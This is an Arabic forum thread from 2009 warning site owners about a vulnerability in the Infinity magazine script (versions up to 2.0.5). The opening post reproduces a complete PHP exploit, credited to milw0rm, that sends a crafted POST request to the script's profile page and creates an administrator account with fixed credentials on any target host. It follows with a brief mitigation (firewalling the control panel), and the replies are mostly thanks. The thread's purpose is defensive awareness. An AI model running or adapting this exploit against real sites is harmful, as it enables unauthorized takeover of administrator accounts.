08-16-2009, 01:45 AM
#1
بيانات اضافيه [
+
]
رقم العضوية : 13918
تاريخ التسجيل : Jun 2009
أخر زيارة : 08-07-2010 (07:08 AM)
المشاركات :
161 [
+
]
التقييم :
50
لوني المفضل : Cadetblue
[ ترقيع ] ثغرة بمجلة الانفنتي !
http://milw0rm.com/exploits/9159
Infinity <= 2.0.5 Arbitrary Create Admin Exploit
كود PHP:
<?php print_r ( ' || || | || o_,_7 _|| . _o_7 _|| q_|_|| o_///_, ( : / (_) / ( . ___________________ _/QQQQQQQQQQQQQQQQQQQ\__ [q] Infinity <= 2.0.5 Create Admin __/QQQ/````````````````\QQQ\___ _/QQQQQ/ \QQQQQQ\ [q] _POST <3 /QQQQ/`` ```QQQQ\ /QQQQ/ \QQQQ\ [q] Owned :) |QQQQ/ By Qabandi \QQQQ| |QQQQ| |QQQQ| |QQQQ| From Kuwait, PEACE... |QQQQ| |QQQQ| |QQQQ| |QQQQ\ iqa[a]hotmail.fr /QQQQ| [/] -[WHAT?]- \QQQQ\ __ /QQQQ/ \QQQQ\ /QQ\_QQQQ/ \QQQQ\ \QQQQQQQ/ \QQQQQ\ /QQQQQ/_ ``\QQQQQ\_____________/QQQ/\QQQQ\_ ``\QQQQQQQQQQQQQQQQQQQ/ `\QQQQ\ ``````````````````` ````` ______________________________________________________________________________ / \ | :: Stupid vulnerability in a good script :( tsk tsk | \______________________________________________________________________________/ \ No More Private / ````````````````` Sec-Code.com USAGE: php whatever.php localhost /infinity/ ' ); ini_set ( "max_execution_time" , 0 ); function QABANDI ( $victim , $vic_dir ){ $host = $victim ; $p = "http://" . $host . $vic_dir ; $data = "name=qabandi&password=qabandi&conf_password=qabandi&email=[COLOR=red] ( تم حذف البريد لأن عرضه مخالف لشروط المنتدى ) [/COLOR]&nat=man&hoppy=QabandiWasHere&text=QabandiWasHere&country=1" ; $packet = "POST " . $p . "/cp/profile.php?action=donewauthor HTTP/1.0\r\n" ; $packet .= "****************************-Type: application/x-www-form-urlencoded\r\n" ; $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n" ; $packet .= "Pragma: no-cache\r\n" ; $packet .= "****************************-Length: " . strlen ( $data ). "\r\n" ; $packet .= "Connection: Close\r\n\r\n" ; $packet .= $data ; //print $packet; $o = @ fsockopen ( $host , 80 ); if(! $o ){ echo "\n[x] No response...\n" ; die; } fputs ( $o , $packet ); while (! feof ( $o )) $data .= fread ( $o , 1024 ); fclose ( $o ); $_404 = strstr ( $data , "HTTP/1.1 404 Not Found" ); if ( !empty( $_404 ) ){ echo "\n[x] 404 Not Found... Make sure of path. \n" ; die; } $_401 = strstr ( $data , "401 Authorization Required" ); if ( !empty( $_401 ) ){ echo "\n[x] HTTP authentication detected! (mrakib jdar narry, maku faydeh) \n" ; die; } echo "Admin created !\n\nUsername: qabandi\npassword: qabandi" ; } $host1 = $argv [ 1 ]; $userdir1 = $argv [ 2 ]; QABANDI ( $host1 , $userdir1 ); die; ?>
حياكم الله ..
ثغرة نزلت بتاريخ 2009-07-15 وللاسف فيه مواقع عربية مصابة للحين ..
خطورة الثغرة : عرض password & user الادمن
ترقيع الثغرة المؤقت : وضع جدار ناري على لوحة تحكم السكربت
فـ بالتالي ماراح يشتغل اكسبلويت الثغرة اللي فوق وماراح تعطي اي نتيجة
الله يحفظكمـ انتمـ ومواقع المسلمين ..
مكتشف الثغرة واحد من الاصدقاء
./ مخاوي الكيبورد
08-16-2009, 02:57 AM
#2
بيانات اضافيه [
+
]
رقم العضوية : 3157
تاريخ التسجيل : Jun 2006
أخر زيارة : 08-24-2014 (06:12 AM)
المشاركات :
112 [
+
]
التقييم :
50
لوني المفضل : Cadetblue
شكرا على التنبيه بارك فيك اخي
08-16-2009, 04:40 AM
#4
بيانات اضافيه [
+
]
رقم العضوية : 3502
تاريخ التسجيل : Oct 2006
أخر زيارة : 04-06-2015 (03:21 AM)
المشاركات :
152 [
+
]
التقييم :
50
لوني المفضل : Cadetblue
شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .
08-16-2009, 05:46 AM
#5
بيانات اضافيه [
+
]
رقم العضوية : 13067
تاريخ التسجيل : Feb 2009
أخر زيارة : 07-22-2010 (04:44 PM)
المشاركات :
4,929 [
+
]
التقييم :
50
لوني المفضل : Cadetblue
شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .
08-16-2009, 12:29 PM
#6
بيانات اضافيه [
+
]
رقم العضوية : 14482
تاريخ التسجيل : Aug 2009
أخر زيارة : 08-31-2012 (01:05 PM)
المشاركات :
709 [
+
]
التقييم :
50
لوني المفضل : Cadetblue
معرض الوسام
مشكورة الله يعطيك العافية
08-16-2009, 05:21 PM
#7
بيانات اضافيه [
+
]
رقم العضوية : 4998
تاريخ التسجيل : Jun 2007
أخر زيارة : 11-30-2015 (09:39 PM)
المشاركات :
18,732 [
+
]
التقييم :
80
MMS ~
لوني المفضل : Cadetblue
الله يستر
مخاوي الكيبورد
مشكور على التنبية
والله يعطيكـ العافية
08-17-2009, 03:53 AM
#8
بيانات اضافيه [
+
]
رقم العضوية : 13844
تاريخ التسجيل : Jun 2009
أخر زيارة : 02-26-2011 (04:33 PM)
المشاركات :
8 [
+
]
التقييم :
50
لوني المفضل : Cadetblue
لازم الاخذ بالحيطه والحذرتقبل مروري مع كل تقدير واحترام لشخصكم الكريم
08-17-2009, 06:30 AM
#9
بيانات اضافيه [
+
]
رقم العضوية : 7479
تاريخ التسجيل : Jun 2008
أخر زيارة : 08-23-2022 (06:15 PM)
المشاركات :
13,899 [
+
]
التقييم :
50
لوني المفضل : Cadetblue
معرض الوسام
مخاوي الكيبورد
الله يكفينا شرها
مشكووور على التنبيه
جود
لا إله إلا أنت سبحانك إني كنت من الظالمين
08-17-2009, 08:52 AM
#11
بيانات اضافيه [
+
]
رقم العضوية : 13918
تاريخ التسجيل : Jun 2009
أخر زيارة : 08-07-2010 (07:08 AM)
المشاركات :
161 [
+
]
التقييم :
50
لوني المفضل : Cadetblue
اقتباس
المشاركة الأصلية كتبت بواسطة طروادا
استاذ مخاوي انت تقول (ترقيع الثغرة المؤقت )ماهو الحل المناسب برائيك للمشكله ؟؟؟
هل يتطلب نقل الموقع الى سير فر اخر اكثر حمايه ؟؟
وياليت نسمع رد الاخوان بالدعم الفني بمنتدى بعد حيي حول هذي المشكله
دمت مبدعاً استاذ مخاوي
اهلين بالحبيب ..
اقصد بالترقيع الموقت حل مبدئ للثغرة من نظري يكون سهل على كل مستخدمين المجله
السيرفر ماله اي دخل لو نقلت الموقع المصاب على اقوى سيرفر بالعالم راح يضل مصاب
لان الثغرة بملفات الموقع ماهي بالسيرفر ..
طبعا شركة ابعاد المعلومات منتجة مجلة انفنتي اخبرها طرحت اكواد برمجيها ( ترقيع ) للملف المصاب بالسكربت
على مايقولون كل الطرق تودئ الى روما ( جدار ناري او ترقيع برمجي ) كلها تمنع تطبيق الثغرة اعلاه ..
نورت
08-18-2009, 04:45 PM
#12
بيانات اضافيه [
+
]
رقم العضوية : 15
تاريخ التسجيل : Apr 2004
أخر زيارة : 10-21-2025 (08:00 AM)
المشاركات :
12,108 [
+
]
التقييم :
24322
لوني المفضل : Cadetblue
بارك فيك ورعاك وحفظك الله على التحذير
الذي عانينا منه
بيوم من الايام
اشكرك وفقك الله ودمت لنا غالينا
08-18-2009, 10:56 PM
#13
بيانات اضافيه [
+
]
رقم العضوية : 12913
تاريخ التسجيل : Jan 2009
أخر زيارة : 04-17-2013 (02:39 PM)
المشاركات :
300 [
+
]
التقييم :
50
لوني المفضل : Cadetblue
شكرا على التنبيه بارك فيك اخي
08-20-2009, 04:09 AM
#14
بيانات اضافيه [
+
]
رقم العضوية : 3737
تاريخ التسجيل : Nov 2006
أخر زيارة : 05-14-2011 (11:19 PM)
المشاركات :
21 [
+
]
التقييم :
50
لوني المفضل : Cadetblue
موفق بإذن الله ... لك مني أجمل تحية .
08-21-2009, 01:54 AM
#15
بيانات اضافيه [
+
]
رقم العضوية : 7212
تاريخ التسجيل : Apr 2008
أخر زيارة : اليوم (05:30 AM)
المشاركات :
442 [
+
]
التقييم :
2822
لوني المفضل : Cadetblue
تسلم ومشكور اخوي على التنبيه